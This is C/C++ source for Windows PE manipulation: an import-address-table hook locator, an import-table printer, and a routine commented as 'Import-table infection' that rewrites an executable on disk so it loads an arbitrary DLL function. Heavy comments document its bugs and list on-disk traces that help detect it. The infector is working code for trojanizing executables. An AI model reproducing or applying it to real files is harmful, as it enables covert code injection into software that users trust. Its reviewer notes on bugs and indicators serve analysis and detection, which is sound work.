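/*
 * Locate the import-address-table slot through which the module held in
 * this->moduleimporting imports OldFunctionName from the DLL DllImportsFrom.
 *
 * The walk is read-only: DOS header -> NT headers -> import data directory ->
 * the descriptor whose Name matches DllImportsFrom (case-insensitive) -> the
 * import-name table (OriginalFirstThunk) entry matching OldFunctionName
 * (case-insensitive). The returned pointer addresses the parallel entry in the
 * import address table (FirstThunk); any write to it is the caller's.
 *
 * DllImportsFrom  - DLL name as it appears in the import descriptor.
 * OldFunctionName - imported symbol name; ordinal-only entries never match.
 *
 * Returns NULL when the object is not loaded, either name is NULL, no module
 * is set, the headers do not carry the MZ/PE signatures, the module has no
 * import directory or no import-name table for that DLL, or nothing matches.
 *
 * The DWORD* return type is kept for existing callers; the slot itself is
 * thunk-sized (IMAGE_THUNK_DATA), i.e. 8 bytes when built for PE32+.
 */
DWORD* CIATHook::IATHook( /*HMODULE hDllWhichImports,*/ char *DllImportsFrom, char *OldFunctionName ){
	if (!this->loaded) return NULL;
	if (!DllImportsFrom || !OldFunctionName) return NULL;

	HMODULE hDllWhichImports = this->moduleimporting;
	if (!hDllWhichImports) return NULL;

	/* All RVA arithmetic is done on a byte pointer of pointer width; the
	 * former long() casts truncated addresses on LLP64 (Win64) builds. */
	BYTE *pBase = reinterpret_cast<BYTE*>(hDllWhichImports);

	PIMAGE_DOS_HEADER pDosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(pBase);
	if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) return NULL;

	PIMAGE_NT_HEADERS pPeHeader = reinterpret_cast<PIMAGE_NT_HEADERS>(pBase + pDosHeader->e_lfanew);
	if (pPeHeader->Signature != IMAGE_NT_SIGNATURE) return NULL;

	const IMAGE_DATA_DIRECTORY &importDir =
		pPeHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
	if (!importDir.VirtualAddress) return NULL;   /* module imports nothing */

	PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor =
		reinterpret_cast<PIMAGE_IMPORT_DESCRIPTOR>(pBase + importDir.VirtualAddress);

	/* Find the descriptor of the exporting DLL; the array ends at Name == 0. */
	PIMAGE_IMPORT_DESCRIPTOR pDesc = NULL;
	for (DWORD dwIndex = 0; pImportDescriptor[dwIndex].Name; dwIndex++) {
		PSTR strCurrent = reinterpret_cast<PSTR>(pBase + pImportDescriptor[dwIndex].Name);
		if (_stricmp(strCurrent, DllImportsFrom) == 0) {
			pDesc = &pImportDescriptor[dwIndex];
			break;
		}
	}
	if (!pDesc) return NULL;

	/* Names are read from the import-name table. Without one the IAT may
	 * already hold bound addresses and carries no names to compare against;
	 * the former code then walked from the image base instead. */
	if (!pDesc->OriginalFirstThunk || !pDesc->FirstThunk) return NULL;
	PIMAGE_THUNK_DATA pIAT = reinterpret_cast<PIMAGE_THUNK_DATA>(pBase + pDesc->FirstThunk);
	PIMAGE_THUNK_DATA pINT = reinterpret_cast<PIMAGE_THUNK_DATA>(pBase + pDesc->OriginalFirstThunk);

	for (DWORD dwIndex = 0; pINT[dwIndex].u1.AddressOfData; dwIndex++) {
		/* An ordinal import has no IMAGE_IMPORT_BY_NAME behind it; the former
		 * code dereferenced the flag bits as if they were an RVA. */
		if (IMAGE_SNAP_BY_ORDINAL(pINT[dwIndex].u1.Ordinal)) continue;

		PIMAGE_IMPORT_BY_NAME pImportName =
			reinterpret_cast<PIMAGE_IMPORT_BY_NAME>(pBase + pINT[dwIndex].u1.AddressOfData);
		if (_stricmp(pImportName->Name, OldFunctionName) == 0) {
			/* Same slot the original returned on PE32; see the header note on width. */
			return reinterpret_cast<DWORD*>(&pIAT[dwIndex].u1.Function);
		}
	}
	return NULL;
}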
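/*
 * Print the import directory of a PE32 image to the debugger output.
 *
 * pBase      - image base; RVAs from the directory are added to it directly,
 *              so the bytes at pBase must be laid out as the loaded image is
 *              (section-aligned), not as the raw file on disk.
 * DataImport - the IMAGE_DIRECTORY_ENTRY_IMPORT data-directory entry.
 * bImport    - when FALSE only the "no import table" check is performed.
 *
 * Returns S_OK in every case; the routine only reads and prints.
 */
HRESULT PE_PrintImport(PBYTE pBase, IMAGE_DATA_DIRECTORY DataImport, BOOL bImport)
{
	/* The former `!pImportBlack` test could never fire (pBase + RVA is non-null
	 * whenever pBase is); test the inputs that actually decide presence. */
	if (!pBase || !DataImport.VirtualAddress || !DataImport.Size)
	{
		dprintf("没有导入表 \n");
		return S_OK;
	}
	if (!bImport)
	{
		return S_OK;
	}

	/* The descriptor array ends at an all-zero entry; Name is the reliable
	 * sentinel. Characteristics aliases OriginalFirstThunk, which some linkers
	 * leave 0 on valid entries, and testing it used to stop the listing early. */
	for (PIMAGE_IMPORT_DESCRIPTOR pImportBlack = PIMAGE_IMPORT_DESCRIPTOR(pBase + DataImport.VirtualAddress);
	     pImportBlack->Name != 0;
	     pImportBlack++)
	{
		/* Pointer-width arithmetic: the former (ULONG) casts truncated pBase on 64-bit builds. */
		PIMAGE_THUNK_DATA32 pFirstThunkData32 = (PIMAGE_THUNK_DATA32)(pBase + pImportBlack->FirstThunk);
		PIMAGE_THUNK_DATA32 pOriginalThunkData32 = (PIMAGE_THUNK_DATA32)(pBase + pImportBlack->OriginalFirstThunk);
		char *pDllName = (PCHAR)(pBase + pImportBlack->Name);
		dprintf("DLL  name  is  %s\n", pDllName);
		dprintf("序号      相对偏移      函数地址      函数名称 \n");

		/* No import-name table: names cannot be recovered from a possibly bound
		 * IAT, so list the DLL only rather than walking thunks from pBase. */
		if (!pImportBlack->OriginalFirstThunk)
		{
			continue;
		}

		for (; pOriginalThunkData32->u1.Ordinal != 0; pOriginalThunkData32++, pFirstThunkData32++)
		{
			/* Pass the 32-bit slot value, not the IMAGE_THUNK_DATA32 union object,
			 * through the variadic call; widths are narrowed to match %08x. */
			DWORD dwIatValue = pFirstThunkData32->u1.Function;
			if (IMAGE_SNAP_BY_ORDINAL32(pOriginalThunkData32->u1.Ordinal))
			{
				DWORD dwEntryRva = (DWORD)((ULONG_PTR)pOriginalThunkData32 - (ULONG_PTR)pBase);
				dprintf("%04d    0x%08x    0x%08x    无\n", IMAGE_ORDINAL32(pOriginalThunkData32->u1.Ordinal), dwEntryRva, dwIatValue);
			}
			else
			{
				PIMAGE_IMPORT_BY_NAME pImageImportByName = (PIMAGE_IMPORT_BY_NAME)(pBase + pOriginalThunkData32->u1.AddressOfData);
				dprintf("%04d    0x%08x    0x%08x    %s\n", pImageImportByName->Hint, (DWORD)pOriginalThunkData32->u1.AddressOfData, dwIatValue, pImageImportByName->Name);
			}
		}
	}
	return S_OK;
}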
// Import-table infection
/*
 * Rewrites the import directory of the PE file at lpFilePath, in place, so that
 * it also names lpFuncName from lpDllName. The existing descriptor array is
 * relocated into the zero padding at the tail of the first section, one
 * descriptor for the new DLL is appended after it, and the new DLL name, a
 * single thunk and the function name are written over the original (zeroed)
 * descriptor array. Outcome and message go to p_msg; tsMsg is filled with the
 * two-argument swprintf, i.e. without a buffer bound.
 *
 * Assumes a PE32 image (IMAGE_OPTIONAL_HEADER32 is used below); PE32+ is not
 * handled. pe_getTextSecOffset, ImageRvaToVa and ImageVaToRva are defined
 * elsewhere in the project.
 *
 * On-disk traces a reviewer can look for in a file touched by this routine:
 * the import directory RVA points into the tail of the first section instead
 * of the original data section; its Size grew by exactly one descriptor; the
 * appended descriptor has OriginalFirstThunk == FirstThunk and zero
 * TimeDateStamp/ForwarderChain; and a DLL name string sits where the original
 * descriptor array used to be.
 */
void pe_infect_eat(LPTSTR lpFilePath,LPSTR lpDllName,LPSTR lpFuncName,ppe_retn_msg p_msg)
{
	// Open the target read/write with exclusive access (share mode 0).
	HANDLE hFile = CreateFile(lpFilePath,
		GENERIC_WRITE | GENERIC_READ,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);

	// Open failed.
	if(hFile == INVALID_HANDLE_VALUE)
	{
		p_msg->isSuccessed = false;
		swprintf(p_msg->tsMsg,L"can't create file! error code : %d",GetLastError());
		//
		return;
	}

	// File size (low DWORD only; the return value is not checked for failure).
	DWORD dwFileSize = GetFileSize(hFile , 0 );

	// Map the whole file read/write; every edit below reaches the file through this view.
	HANDLE hMap = CreateFileMapping(hFile ,
		0 ,
		PAGE_READWRITE ,
		0 ,
		dwFileSize ,
		0);

	// Mapping object could not be created.
	if(hMap == INVALID_HANDLE_VALUE)
	{
		CloseHandle(hFile);

		p_msg->isSuccessed = false;
		swprintf(p_msg->tsMsg,L"can't create file mapping! error code : %d",GetLastError());
		//
		return ;
	}

	// Base address of the mapped view.
	PBYTE lpBase = (PBYTE)MapViewOfFile(hMap , FILE_MAP_READ | FILE_MAP_WRITE , 0 , 0 , dwFileSize);

	// View could not be mapped (lpBase is NULL on this path, and is still passed to UnmapViewOfFile).
	if(lpBase == NULL)
	{
		CloseHandle(hFile);
		CloseHandle(hMap);
		UnmapViewOfFile(lpBase);

		p_msg->isSuccessed = false;
		swprintf(p_msg->tsMsg,L"can't map view of file! error code : %d",GetLastError());
		//
		return ;
	}

	// DOS header at the start of the view.
	PIMAGE_DOS_HEADER pImage_dos_header = (PIMAGE_DOS_HEADER)lpBase;

	// NT headers; the (DWORD) cast of lpBase truncates the pointer on 64-bit builds.
	PIMAGE_NT_HEADERS pImage_nt_header = (PIMAGE_NT_HEADERS)((DWORD)lpBase + pImage_dos_header->e_lfanew);

	// Optional header located by hand: e_lfanew + 4 bytes of PE signature + IMAGE_FILE_HEADER,
	// typed as the PE32 layout.
	PIMAGE_OPTIONAL_HEADER32 pImage_optional_header = (PIMAGE_OPTIONAL_HEADER32)(lpBase + pImage_dos_header->e_lfanew + 4 + sizeof(IMAGE_FILE_HEADER));

	// First section header.
	PIMAGE_SECTION_HEADER pImage_section_header = IMAGE_FIRST_SECTION(pImage_nt_header);

	// .text section PointerToRawData (helper defined elsewhere). It is only tested for zero
	// below; the padding search further down uses the first section header, not this value.
	DWORD dwSectionOffset = pe_getTextSecOffset(pImage_section_header, pImage_nt_header->FileHeader.NumberOfSections);

	// No .text section found.
	if(dwSectionOffset == 0)
	{
		CloseHandle(hFile);
		CloseHandle(hMap);
		UnmapViewOfFile(lpBase);

		p_msg->isSuccessed = false;
		swprintf(p_msg->tsMsg,L"can't find .text section!");
		//
		return ;
	}

	/*
	PointerToRawData is the section's offset within the PE file.
	SizeOfRawData >= VirtualSize
	VirtualSize      is the section's length in memory
	SizeOfRawData    is VirtualSize rounded up to the file alignment.
	For example: if the .text code is 0x110 bytes long but the file alignment is 0x400, then .text's SizeOfRawData is 0x400 while its VirtualSize is 0x110
	*/

	// Existing import descriptor array. DataDirectory[1] is the import directory (the named
	// constant IMAGE_DIRECTORY_ENTRY_IMPORT is used for the same entry further down).
	PIMAGE_IMPORT_DESCRIPTOR pImage_import_descriptor = (PIMAGE_IMPORT_DESCRIPTOR)ImageRvaToVa(pImage_nt_header,lpBase,pImage_nt_header->OptionalHeader.DataDirectory[1].VirtualAddress,NULL);
	
	// Number of existing descriptors.
	int importTableCount = 0;

	// Count descriptors up to the all-zero terminator (Characteristics aliases OriginalFirstThunk).
	while(pImage_import_descriptor[importTableCount].Characteristics != 0)
	{
		importTableCount ++;
	}

	// Byte size of the existing descriptor array, terminator excluded.
	DWORD dwBufferSize = sizeof(IMAGE_IMPORT_DESCRIPTOR) * importTableCount;

	// Last byte of the first section's raw data (not necessarily .text; see the note above).
	PBYTE pSectionEnd = lpBase + pImage_section_header->PointerToRawData + pImage_section_header->SizeOfRawData - 1;

	// Number of zero padding bytes found at the section tail.
	UINT pPadSize = 0;

	// Walk backwards over trailing zero bytes. There is no lower bound: a section that is
	// entirely zero lets the walk leave the section (and potentially the mapped view).
	while(*pSectionEnd == 0)
	{
		pPadSize ++;
		pSectionEnd --;
	}
	
	// Start of the area that is overwritten below. This is where the scan stopped, i.e. the
	// last non-zero byte, not the first padding byte.
	PBYTE pSectionStart = pSectionEnd; 

	// Room for the relocated array plus one descriptor. The name strings and thunk written
	// further down are not counted here; they go into the old array's location instead.
	if (pPadSize < dwBufferSize + sizeof(IMAGE_IMPORT_DESCRIPTOR))
	{
		CloseHandle(hFile);
		CloseHandle(hMap);
		UnmapViewOfFile(lpBase);

		p_msg->isSuccessed = false;
		swprintf(p_msg->tsMsg,L"not enough space in .text section!");
		//
		return ;
	}

	// Relocate the original descriptor array into the section padding.
	memcpy(pSectionStart,pImage_import_descriptor,dwBufferSize);

	// Zero the original array; its space is reused for the new DLL name, thunk and function name.
	memset(pImage_import_descriptor,0,dwBufferSize);

	// The appended descriptor sits immediately after the relocated array.
	PIMAGE_IMPORT_DESCRIPTOR pImage_import_descriptor_new = PIMAGE_IMPORT_DESCRIPTOR(pSectionStart + dwBufferSize);

	// New DLL name over the old first descriptor slot (unbounded strcpy; nothing checks that
	// lpDllName fits inside the zeroed area).
	strcpy((PCHAR)pImage_import_descriptor,lpDllName);
	// IMAGE_IMPORT_BY_NAME entry placed 5 elements past the old second descriptor slot; the
	// arithmetic is in IMAGE_IMPORT_BY_NAME units, not bytes.
	PIMAGE_IMPORT_BY_NAME  pImage_import_by_name = (PIMAGE_IMPORT_BY_NAME)((PCHAR)(pImage_import_descriptor + 1)) + 5;

	// RVA of that entry; it becomes the value of the single thunk.
	DWORD dwThunkData = (DWORD)ImageVaToRva(pImage_nt_header,lpBase,(ULONG)pImage_import_by_name);

	// The one thunk lives at the old second descriptor slot (4 bytes, PE32 thunk width).
	memcpy((PCHAR)(pImage_import_descriptor + 1), &dwThunkData, 4);

	pImage_import_by_name->Hint = 0;
	// Function name (unbounded strcpy, same caveat as the DLL name).
	strcpy((PCHAR)pImage_import_by_name->Name,lpFuncName);

	// Fill in the appended descriptor. OriginalFirstThunk and FirstThunk both reference the
	// same single slot written above.
	pImage_import_descriptor_new->Name = (DWORD)ImageVaToRva(pImage_nt_header,lpBase,(ULONG)pImage_import_descriptor);
	pImage_import_descriptor_new->FirstThunk = (DWORD)ImageVaToRva(pImage_nt_header,lpBase,(ULONG)(pImage_import_descriptor + 1));
	pImage_import_descriptor_new->OriginalFirstThunk = (DWORD)ImageVaToRva(pImage_nt_header,lpBase,(ULONG)(pImage_import_descriptor + 1));
	pImage_import_descriptor_new->ForwarderChain = 0;
	pImage_import_descriptor_new->TimeDateStamp = 0;

	// Repoint the import directory at the relocated array in the section padding and grow
	// its Size by one descriptor.
	pImage_optional_header->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress = (DWORD)ImageVaToRva(pImage_nt_header,lpBase,(ULONG)(pSectionStart));
	pImage_optional_header->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size +=sizeof(IMAGE_IMPORT_DESCRIPTOR);

	// Release the file. Handles are closed before the view is unmapped, and no explicit
	// FlushViewOfFile is issued.
	CloseHandle(hFile);
	CloseHandle(hMap);
	UnmapViewOfFile(lpBase);

	p_msg->isSuccessed = true;

	//
	return ;
}